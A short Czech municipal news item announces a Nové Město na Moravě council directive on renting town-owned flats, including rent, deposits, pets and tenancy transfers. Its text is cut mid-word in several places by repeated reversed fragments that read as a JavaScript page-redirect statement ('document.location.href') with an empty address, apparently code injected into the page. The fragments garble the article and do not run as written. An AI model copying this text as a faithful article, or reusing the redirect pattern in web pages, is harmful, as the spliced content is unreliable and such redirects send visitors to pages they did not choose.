Rainbow page separator

Novoměstská radnice upřesnila podmínky pronájmu bytů

Čtvrtek, 21. května 2015

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Nová směrnice novoměstských radních upravuje pronájem bytů ve vlastnictví města. Důvodem jejího vydání byla potřeba novoměstské radnice upřesnit postup při hospodaření s městskými byty. Mimo jiné je ve směrnici uveden také systém při obsazování volných bytů města, výše úhrady jistiny, případný přechod nájmu či výměna, případně pronájem by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové jednotky. Hlavní změny se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž týkají především výše nájemného pro nově obsazované byty, výše jistiny a zrušení možnosti požádat o její prominutí, odpisu poplatků a úroků z prodlení. S tím je spojeno i upřesnění podmínek ohledně případného přihlášení spolubydlící osoby, chovu zvířat, trvalého pobytu, přihláška do výběrového řízení na uvolněný byt, přechod nájmu a podobně.
Směrnice je zájemcům k dispozici na webové adrese novoměstské radnice https://radnice.nmnm.cz/volene organy/rada mesta/ostatni predpisy města vydavane radou mesta.